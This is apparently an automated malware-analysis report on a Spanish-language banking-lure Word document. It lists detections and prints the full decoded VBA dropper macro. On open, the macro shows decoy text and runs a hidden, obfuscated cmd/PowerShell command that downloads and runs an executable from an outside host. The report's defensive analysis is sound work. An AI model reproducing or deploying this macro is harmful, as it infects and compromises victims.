Verdict: MALICIOUS
Risk Score: 250

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059.003 Windows Command Shell
- T1204.002 Malicious File
- T1071.001 Web Protocols
The file contains VBA macros, including a Document_Open auto-execution macro, which is designed to run code upon opening the document. Heuristics indicate the use of ShellExecute and cmd.exe, suggesting the macro's purpose is to download and execute a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-1890089' further supports this dropper functionality.
Heuristics (8)

- ClamAV: Doc.Dropper.Agent-1890089 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-1890089
- Reference to ShellExecute API [high] SC_STR_SHELLEXEC: Reference to ShellExecute API
- VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call. Matched lines in script:
  `'8`
  `Set objShelattackmedal = CreateObject("shell.application")`
  `loadmountain = "q3kX4K9B.qGeGqxIGeGk'U)GU BG&KX k%GtImBGpK%k\UqARdBkokUvBkek6BB5G8U0" & huntone`
- cmd.exe reference in VBA [high] OLE_VBA_CMD: cmd.exe reference in VBA. Matched lines in script:
  `dadnltkrvwjnlk = 225`
  `objShelattackmedal.ShellExecute "cmd.exe", luivpnwmr, "", "open", 0`
  `End If`
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low] OLE_VBA_DOCOPEN: Document_Open macro. Matched lines in script:
  `Attribute VB_Customizable = True`
  `Public Sub DoCUmeNT_oPEn()`
  `qrklpjpljsnxxexkk = "affairuncle"`
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3857 bytes |

SHA-256 of macros.bas: 46646f75f0c10f35e854141e878319cffbf48c780268d50e66341a69e8068c00
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub DoCUmeNT_oPEn()
qrklpjpljsnxxexkk = "affairuncle"
cipkxvudtrz = 670
'solvestairsbamboolunch
'684
Módulo1.fcvfzuilfsadr
End Sub
Attribute VB_Name = "Módulo1"
Public Function callchoose(attackmedal)
Dim bunkerrescue As Boolean
pclnkahnpufvtjnlac = ""
bunkerrescue = InStrRev("GBkRGKBXkkIqU", attackmedal)
'xsaagarzbfuqcboattool
'336
pvuyohdkklmmbv = "genresell"
dikzykbmkcxdcfayank = 944
If Not bunkerrescue Then
'tcjgqslanrlqbofuiomjzieknmnko
'706
pclnkahnpufvtjnlac = attackmedal
accountbest = "pdkuzbkmqozkhzfqye"
claydefense = 941
End If
callchoose = pclnkahnpufvtjnlac
'bundlereplacebuildtravel
'819
legunknown = "goddessmagnet"
ldeofxugzfvpcep = 552
End Function
Public Function terikxclfmxbiqjqnvg(stpclnkahnpufvtjnlac)
zmruitlbmhmuwlgtql = ""
'fantoembdfkpnlohlubu
'939
For sadnessvisit = 1 To Len(stpclnkahnpufvtjnlac)
'dsajzgynvqduhoqsnbrhybridpicture
'771
'frameplungeqleyjsumrez
'460
cautionfatigue = Mid(stpclnkahnpufvtjnlac, sadnessvisit, 1)
zmruitlbmhmuwlgtql = zmruitlbmhmuwlgtql & callchoose(cautionfatigue)
bidheight = "cablelife"
ohrytbhwjhefzv = 218
racksport = "fvwsyotyvuodedfpqk"
dcunplrfjnwpyvqsyz = 81
Next
'edzpjkvuanezovufbeginfoster
'333
cgjomikyg = "prvujcwtidkx"
sqpfkynwjynqmseuvwe = 658
terikxclfmxbiqjqnvg = zmruitlbmhmuwlgtql
'hvzfeyespzkjcapablecity
'715
'chaseskimistakeover
'886
End Function
Public Sub fcvfzuilfsadr()
'ccwvahiklsjxffyixpsdrnin
'243
obligeocean = "beanfragile"
burstnear = 849
labelthank = "oBRaUdkFkiXlkIeRR(qX'XRhBItBqtGRpq:G/RU/kdkKrkkyRvkkeUXrqGsIdqKoUcGkuBBmGeknGBtUskaknGBdqkcqkuGsGktIokmkR.GkcXokImGG/Rqjkk4IkvXk4BBukpGdBaUtR3kGsUR2X0q1K6BI.UReKxGkeI'kB,G'R%qqTkEkkMKPUq%GG\IARBdBKoBBvKeqB6G5q8K0G9"
crumblenose = "gubxywqzvnkzwzkjn"
fatherlabel = 507
huntone = "kI9k3kk4kX9GR.keUxUke"
ktqctcvxgnwlo = "nmzztzwxlkojce"
earthfun = 260
With ActiveDocument.InlineShapes
Do While .Count > 0
'fxcnxcyrnadmbspacevacuum
'366
.Item(1).Delete
'basickittenindustrywedding
'903
'benefittradeiaewopwzxftntynhoiu
'730
Loop
'inhalerelyanxietyweird
'105
pencilrepeat = "ifdaxzkuxlhwtyg"
zzzrmkloww = 501
End With
Selection.TypeText ("Estimado Cliente." & vbCrLf)
Selection.TypeText ("Su pedido ha sido verificado y aprobado por su banco. Conserve este número de folio para cualquier trámite como Cambios y Cancelaciones B098752sdf307." & vbCrLf)
'meshslimflymetal
'897
Selection.TypeText ("Puede Imprimir este documento para su referencia." & vbCrLf)
Selection.TypeText ("Institución de Banca Múltiple" & vbCrLf)
pjcvmifdjlpzga = "junkversion"
gptrryjcwc = 536
'coachtrafficmutualstay
'8
Set objShelattackmedal = CreateObject("shell.application")
loadmountain = "q3kX4K9B.qGeGqxIGeGk'U)GU BG&KX k%GtImBGpK%k\UqARdBkokUvBkek6BB5G8U0" & huntone
'vircxzyuvyyfjuewayjftfeyt
'384
luivpnwmr = "IcKmGdk.keXxkeG kB/BcU kGpqBoqIwGXekkrGkskRhkKeUKlGlk.BeGBxGeGR BG-BKwI GhkikdqkdGqeBInkk B-XnUoXGpUB XU-XkeBUpK XbGyqKpkaRqsqsq kG(INXeBwBB-GOKbIqjXeGcqtBB BSByBksGItBeXImXq.INkkekKtk.GWXekbkCKlkiIeRXnBBtB)XI.BDIoIBwIqnklq"
luivpnwmr = terikxclfmxbiqjqnvg(luivpnwmr & labelthank & loadmountain)
'joketrayavmdyiiozydb
'398
'bviqolxyfoobvwxvvwnwabxfggv
'686
If luivpnwmr <> labelthank Then
'absorbobservegupxnxktgscfrdo
'322
vqbgyazqh = "ugtjercoomx"
dadnltkrvwjnlk = 225
objShelattackmedal.ShellExecute "cmd.exe", luivpnwmr, "", "open", 0
End If
If huntone = labelthank Then
'jmgdwnmcuyfblouseunlock
'829
luivpnwmr = "kI9k3kk4kX9GR.keUxUke"
End If
fmcqvspqu = "buzzritual"
antennaeast = 472
End Sub
```